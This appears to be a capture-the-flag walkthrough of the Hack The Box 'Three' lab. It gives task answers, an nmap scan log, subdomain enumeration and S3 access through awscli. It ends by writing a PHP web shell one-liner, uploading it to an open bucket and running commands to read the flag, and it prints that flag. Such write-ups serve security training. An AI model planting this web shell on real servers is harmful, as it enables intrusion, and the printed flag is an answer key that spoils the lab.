Three

Task #1: How many TCP ports are open?

  • A: 2

  • nmap -sC -sV -p- -T5 -v 10.129.202.49

    $ nmap -sC -sV -p- -T5 -vv 10.129.202.49
    Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 15:18 EST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Initiating Ping Scan at 15:18
    Scanning 10.129.202.49 [2 ports]
    Completed Ping Scan at 15:18, 0.27s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:18
    Completed Parallel DNS resolution of 1 host. at 15:18, 0.01s elapsed
    Initiating Connect Scan at 15:18
    Scanning 10.129.202.49 [65535 ports]
    Discovered open port 22/tcp on 10.129.202.49
    Discovered open port 80/tcp on 10.129.202.49
    Warning: 10.129.202.49 giving up on port because retransmission cap hit (2).
    Completed Connect Scan at 15:18, 11.89s elapsed (65535 total ports)
    Initiating Service scan at 15:18
    Scanning 2 services on 10.129.202.49
    Completed Service scan at 15:18, 6.28s elapsed (2 services on 1 host)
    NSE: Script scanning 10.129.202.49.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 3.39s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.48s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Nmap scan report for 10.129.202.49
    Host is up, received conn-refused (0.016s latency).
    Scanned at 2022-12-13 15:18:09 EST for 22s
    Not shown: 60242 closed ports, 5291 filtered ports
    Reason: 60242 conn-refused and 5291 no-responses
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
    |   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
    |   256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
    80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: The Toppers
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 15:18
    Completed NSE at 15:18, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds
    

Task #2: What is the domain of the email address provided in the "Contact" section of the website?

  • A: thetoppers.htb

Task #3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

  • A: /etc/hosts

Task #4: Which sub-domain is discovered during further enumeration?

  • A: s3.thetoppers.htb
  • Add 10.129.202.49 thetoppers.htb to /etc/hosts
  • gobuster vhost -u thetoppers.htb -w subdomains.txt

Task #5: Which service is running on the discovered sub-domain?

  • A: Amazon S3
  • Add s3.thetoppers.htb to /etc/hosts

Task #6: Which command line utility can be used to interact with the service running on the discovered sub-domain?

  • A: awscli

Task #7: Which command is used to set up the AWS CLI installation?

  • A: aws configure
  • sudo apt install awscli

Task #8: What is the command used by the above utility to list all of the S3 buckets?

  • A: aws s3 ls
  • Enter some random values for the access key and secret key so the commands will run

Task #9: This server is configured to run files written in what web scripting language?

  • A: PHP

Root flag: a980d99281a28d638ac68b9bf9453c2b

  • aws --endpoint http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb shows us an .htaccess file and an index.php file

  • Create a PHP payload to run commands with echo '<?php system($_GET["cmd"]); ?>' > shell.php

    Then upload it to the bucket with aws --endpoint http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb

  • Run the ls command to test. It works, so try running ls ../ to see the next directory up. That shows a flag.txt file, which we can view with cat ../flag.txt


Tags

  1. very easy (Private)
  2. AWS (Private)
  3. s3 (Private)